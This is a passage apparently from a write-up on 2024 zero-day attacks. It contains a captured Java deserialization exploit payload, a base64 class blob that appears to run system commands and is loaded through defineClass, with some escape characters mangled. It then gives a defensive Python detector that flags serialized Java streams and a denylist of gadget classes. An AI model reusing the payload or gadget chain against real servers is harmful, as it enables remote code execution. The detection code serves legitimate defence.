xqYXZhL2xhbmcvT2JqZWN0OylaAQAEdHJpbQEACnN0YXJ0c1dpdGgBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoBA
AVzcGxpdAEAJyhMamF2YS9sYW5nL1N0cmluZzspW0xqYXZhL2xhbmcvU3RyaW5nOwEACHBhcnNlSW50AQAVKExq
YXZhL2xhbmcvU3RyaW5nOylJAQAXKExqYXZhL2xhbmcvUnVubmFibGU7KVYBAAVzdGFydAEAFShMamF2YS9sYW5
nL1N0cmluZzspVgEAEShMamF2YS9pby9GaWxlOylWAQAFKFtCKVYBAAVmbHVzaAEABWNsb3NlAQAIdG9TdHJpbm
cBAA9nZXRBYnNvbHV0ZVBhdGgBAAdyZXBsYWNlAQBEKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0xqYXZhL2xhb
mcvQ2hhclNlcXVlbmNlOylMamF2YS9sYW5nL1N0cmluZzsBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVy
dHkBAAt0b0xvd2VyQ2FzZQEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmd
CdWlsZGVyOwEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOw
EAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEAD
mdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07
KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAA5nZXR
FcnJvclN0cmVhbQEAB2Rlc3Ryb3kBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAB
YoTGphdmEvbGFuZy9TdHJpbmc7SSlWAQAPZ2V0T3V0cHV0U3RyZWFtAQAYKClMamF2YS9pby9PdXRwdXRTdHJlY
W07AQAIaXNDbG9zZWQBABNqYXZhL2lvL0lucHV0U3RyZWFtAQAJYXZhaWxhYmxlAQADKClJAQAEcmVhZAEAFGph
dmEvaW8vT3V0cHV0U3RyZWFtAQAEKEkpVgEABXNsZWVwAQAEKEopVgEACWV4aXRWYWx1ZQEACmdldE1lc3NhZ2U
BAAhpbnRWYWx1ZQAhAI8AHgABAA8AAwAaAJAAkQABAJIAAAACAJMAAgCUAJEAAAACAJUAlgAAAAkAAQCXAJgAAg
CZAAADtgAGABMAAAKOKrcAAbgAArYAA0wrtgAEEgW2AAZNLAS2AAcsK7YACMAACcAACU4tOgQZBL42BQM2BhUGF
QWiAlgZBBUGMjoHGQfHAAanAkMZB7YACjoIGQgSC7YADJoADRkIEg22AAyaAAanAiUZB7YABBIOtgAGTSwEtgAH
LBkHtgAIOgkZCcEAD5oABqcCAhkJtgAEEhC2AAZNLAS2AAcsGQm2AAg6CRkJtgAEEhG2AAZNpwAWOgoZCbYABLY
AE7YAExIRtgAGTSwEtgAHLBkJtgAIOgkZCbYABLYAExIUtgAGTacAEDoKGQm2AAQSFLYABk0sBLYABywZCbYACD
oJGQm2AAQSFbYABk0sBLYABywZCbYACMAAFsAAFjoKGQq5ABcBADoLGQu5ABgBAJkBWxkLuQAZAQA6DBkMtgAEE
hq2AAZNLAS2AAcsGQy2AAg6DRkNtgAEEhsDvQActgAdGQ0DvQAetgAfOg4ZDbYABBIgBL0AHFkDEiFTtgAdGQ0E
vQAeWQMSIlO2AB/AACE6DxkPxwAGp/+RKhkPtgAjtgAkOhAZDrYABBIlBL0AHFkDsgAmU7YAHRkOBL0AHlkDEQD
IuAAnU7YAH1cqEii2ACk6ERkRtgAqOgkZERIrBr0AHFkDEixTWQSyACZTWQWyACZTtgAtGQkGvQAeWQMZEFNZBA
O4ACdTWQUZEL64ACdTtgAfVxkOtgAEEi4EvQAcWQMZEVO2AB0ZDgS9AB5ZAxkJU7YAH1enAE86ESoSMLYAKToSG
RISMQS9ABxZAxIsU7YALRkSBL0AHlkDGRBTtgAfOgkZDrYABBIuBL0AHFkDGRJTtgAdGQ4EvQAeWQMZCVO2AB9X
pwAOpwAFOgiEBgGn/aexAAcAoACrAK4AEgDOANwA3wASAcQCMAIzAC8APwBEAoUALwBHAGIChQAvAGUAhQKFAC8
AiAJ/AoUALwABAJoAAADeADcAAAAXAAQAGAALABkAFQAaABoAGwAmAB0APwAfAEcAIABOACEAZQAiAHAAIwB1AC
QAfQAlAIgAJgCTACcAmAAoAKAAKgCrAC0ArgArALAALADBAC4AxgAvAM4AMQDcADQA3wAyAOEAMwDsADUA8QA2A
PkANwEEADgBCQA5ARcAOgEzADsBPgA8AUMAPQFLAD4BZAA/AYoAQAGPAEEBkgBDAZ0ARAHEAEYBzABHAdMASAIO
AEkCMABOAjMASgI1AEsCPQBMAl0ATQJ/AE8CggBTAoUAUQKHAB0CjQBVAJsAAAAEAAEALwABAJwAnQADAJkAAAA
5AAIAAwAAABEruAAysE24AAK2ADQrtgA1sAABAAAABAAFADMAAQCaAAAADgADAAAAXwAFAGAABgBhAJsAAAAEAA
EAMwCeAAAAAgCfAAEAoAChAAEAmQAAAP8ABAAEAAAAmyvGAAwSNiu2ADeZAAYSOLArtgA5TCsSOrYAO5kAOyort
wA8Ej22AD5NLL4FnwAGEj+wKiwDMrUAQCosBDK4AEG4ACe1AEK7AENZKrcARE4ttgBFEkawKxJHtgA7mQAiKiu3
ADwSPbYAPk0svgWfAAYSSLAqLAMyLAQytgBJsCsSSrYAO5kADSoqK7cAPLYAS7AqKiu3ADy2AEuwAAAAAQCaAAA
AUgAUAAAAawANAGwAEABuABUAbwAeAHEAKQByAC8AcwAyAHUAOQB2AEYAdwBPAHgAUwB5AFYAegBfAHsAagB8AH
AAfQBzAH8AfgCAAIcAgQCRAIMAAQCiAKMAAQCZAAAAdgADAAUAAAA2uwBMWSu3AE1OuwBOWS23AE86BBkELLgAU
LYAURkEtgBSGQS2AFOnAAs6BBkEtgBUsC22AFWwAAEACQAmACkALwABAJoAAAAmAAkAAACOAAkAkAATAJEAHACS
ACEAkwAmAJYAKQCUACsAlQAxAJcAAgCkAKEAAQCZAAAALwADAAIAAAAXKxI6Eja2AFYSShI2tgBWEkcSNrYAVrA
AAAABAJoAAAAGAAEAAACgAAEApQChAAEAmQAAAcMABAAJAAABJxJXuABYtgBZTSu2ADlMAU4sElq2AAyZAEArEl
u2AAyZACArEly2AAyaABe7AF1ZtwBeK7YAXxJgtgBftgBhTAa9ACFZAxIiU1kEEmJTWQUrUzoEpwA9KxJbtgAMm
QAgKxJctgAMmgAXuwBdWbcAXiu2AF8SY7YAX7YAYUwGvQAhWQMSZFNZBBJlU1kFK1M6BLgAZhkEtgBnTrsAaFkt
tgBptwBqEmu2AGw6BRkFtgBtmQALGQW2AG6nAAUSNjoGuwBoWS22AG+3AGoSa7YAbDoFuwBdWbcAXhkGtgBfGQW
2AG2ZAAsZBbYAbqcABRI2tgBftgBhOgYZBjoHLcYABy22AHAZB7A6BRkFtgBUOgYtxgAHLbYAcBkGsDoILcYABy
22AHAZCL8ABACQAPsBBgAvAJAA+wEaAAABBgEPARoAAAEaARwBGgAAAAEAmgAAAGoAGgAAAKkACQCqAA4AqwAQA
K0AGQCuACsArwA/ALEAVgCzAGgAtAB8ALYAkAC5AJkAugCrALsAvwC8ANEAvQD3AL4A+wDCAP8AwwEDAL4BBgC/
AQgAwAEPAMIBEwDDARcAwAEaAMIBIADDAAEApgCnAAEAmQAAAXIABAAMAAAA4hJXuABYtgBZElq2AAyaAAkScU6
nAAYSck64AGYttgBzOgS7AHRZKxy3AHU6BRkEtgBpOgYZBLYAbzoHGQW2AHY6CBkEtgB3OgkZBbYAeDoKGQW2AH
maAGAZBrYAep4AEBkKGQa2AHu2AHyn/+4ZB7YAep4AEBkKGQe2AHu2AHyn/+4ZCLYAep4AEBkJGQi2AHu2AHyn/
+4ZCrYAfRkJtgB9FAB+uACAGQS2AIFXpwAIOgun/54ZBLYAcBkFtgCCpwAgTrsAXVm3AF4Sg7YAXy22AIS2AF8S
hbYAX7YAYbAShrAAAgCnAK0AsAAvAAAAvwDCAC8AAQCaAAAAbgAbAAAA0QAQANIAFgDUABkA1gAiANcALQDYAEI
A2QBQANoAWADbAGAA3ABtAN4AdQDfAIIA4QCKAOIAlwDkAJwA5QChAOYApwDoAK0A6QCwAOoAsgDrALUA7QC6AO
4AvwDxAMIA7wDDAPAA3wDyAAEAqACYAAEAmQAAAC0AAwABAAAAESoqtABAKrQAQrYAh7YAiFexAAAAAQCaAAAAC
gACAAAA9wAQAPgACQCpAKoAAQCZAAABHAAGAAQAAACsAUwSibgAMk0sEooEvQAcWQMSIVO2AB0stgAqBL0AHlkD
KlO2AB/AACzAACxMpwAETSvHAEMSi7gAMhKMA70AHLYAHQEDvQAetgAfTSy2AAQSjQS9ABxZAxIhU7YAHSwEvQA
eWQMqU7YAH8AALMAALEynAARNK8cANBKOuAAyTSwSjQS9ABxZAxIhU7YAHU4tLLYAKgS9AB5ZAypTtgAfwAAswA
AsTKcABE0rsAADAAIALQAwAC8ANQBxAHQALwB5AKYAqQAvAAEAmgAAAEYAEQAAAQAAAgECAAgBAwAtAQYAMAEEA
DEBBwA1AQkATAEKAHEBDQB0AQsAdQEPAHkBEQB/ARIAjwETAKYBFgCpARQAqgEYAAEAqwAAAAIArA==";x0ac
lz =
defineClassx28base64DecodeToBytex28codex29x29;clz.newInstancex28x29;tx00x04eval
uqx00~x00x1bx00x00x00x01qx00~x00#srx00x11java.util.HashMapx05x07xdaxc1x
c3x16`xd1x03x00x02Fx00x0aloadFactorIx00x09thresholdxp?
@x00x00x00x00x00x00wx08x00x00x00x10x00x00x00x00xxx")}}
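The MonitorServlet capture above is a Java serialization stream: it opens with the stream magic `AC ED 00 05` and carries class descriptors for `org.apache.commons.collections.keyvalue.TiedMapEntry`, `map.LazyMap`, `functors.ChainedTransformer`, `functors.ConstantTransformer`, `functors.InvokerTransformer` and `javax.script.ScriptEngineManager`, the usual Commons Collections gadget chain ending in a script engine. The Python inspector below is an added defender-side example, not code from the article or from any product: it recognises the stream either raw or base64-encoded (where the magic becomes the prefix `rO0AB`), pulls class names out of `TC_CLASSDESC` (0x72) records with a length-prefix heuristic rather than a full parser, and reports which names fall in a gadget denylist. The denylist is seeded from the class names visible in this capture; the sample stream is constructed with the right framing only and is not a working chain.

```python
import base64
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"   # java.io.ObjectStreamConstants.STREAM_MAGIC + version 5
BASE64_MAGIC = "rO0AB"               # what STREAM_MAGIC becomes once base64-encoded
TC_CLASSDESC = 0x72                  # tag that precedes a 2-byte length + class name

# Gadget-chain classes seen in the capture above; extend with others you care about.
GADGET_CLASSES = {
    "org.apache.commons.collections.keyvalue.TiedMapEntry",
    "org.apache.commons.collections.map.LazyMap",
    "org.apache.commons.collections.functors.ChainedTransformer",
    "org.apache.commons.collections.functors.ConstantTransformer",
    "org.apache.commons.collections.functors.InvokerTransformer",
    "javax.script.ScriptEngineManager",
}
CLASS_NAME_RE = re.compile(rb"^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)+$")


def decode_stream(body):
    """Return (stream_bytes, encoding) if body is a Java serialization stream,
    raw or base64-encoded; otherwise (None, None)."""
    if body.startswith(STREAM_MAGIC):
        return body, "raw"
    text = body.decode("ascii", errors="ignore").strip()
    if text.startswith(BASE64_MAGIC):
        try:
            decoded = base64.b64decode(text + "=" * (-len(text) % 4))
        except ValueError:
            return None, None
        if decoded.startswith(STREAM_MAGIC):
            return decoded, "base64"
    return None, None


def class_names(stream):
    """Collect class names that follow a TC_CLASSDESC tag. Heuristic: a 0x72 byte,
    a big-endian 16-bit length, then that many bytes forming a dotted Java name."""
    names = []
    i = 0
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            (length,) = struct.unpack(">H", stream[i + 1:i + 3])
            candidate = stream[i + 3:i + 3 + length]
            if 0 < length < 256 and len(candidate) == length and CLASS_NAME_RE.match(candidate):
                names.append(candidate.decode("ascii"))
                i += 3 + length
                continue
        i += 1
    return names


def inspect_body(body):
    """Summarise a request body: is it serialized Java, how was it encoded,
    which classes does it carry, and which of those are known gadgets."""
    stream, encoding = decode_stream(body)
    if stream is None:
        return {"serialized": False, "encoding": None, "classes": [], "gadgets": []}
    names = class_names(stream)
    return {"serialized": True, "encoding": encoding, "classes": names,
            "gadgets": sorted(set(names) & GADGET_CLASSES)}


def build_sample_stream():
    """Constructed sample with the framing the detector keys on (magic, TC_OBJECT,
    TC_CLASSDESC records). It is not a functional gadget chain."""
    def classdesc(name):
        encoded = name.encode("ascii")
        return bytes([TC_CLASSDESC]) + struct.pack(">H", len(encoded)) + encoded + b"\x00" * 10
    return (STREAM_MAGIC + b"\x73"
            + classdesc("java.util.HashSet")
            + classdesc("org.apache.commons.collections.map.LazyMap")
            + classdesc("org.apache.commons.collections.functors.InvokerTransformer"))


SAMPLE_RAW = build_sample_stream()
SAMPLE_B64 = base64.b64encode(SAMPLE_RAW)

if __name__ == "__main__":
    for label, body in (("raw", SAMPLE_RAW), ("base64", SAMPLE_B64), ("form", b"s_bean=x&script=y")):
        print(label, inspect_body(body))
```

Used inline in a WAF or proxy tap, the useful policy is two-tiered: any `serialized` hit on an endpoint that has no business accepting Java serialization is worth a block or an alert on its own, and a non-empty `gadgets` list should page someone. Class-name scanning also catches the base64 form that often hides inside a single parameter, which a plain magic-byte check at the start of the body would miss.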
Originally published on the WeChat public account 东南网络安全: "HVV 2024 vulnerability review: why did these 0day vulnerabilities bring enterprises down overnight?"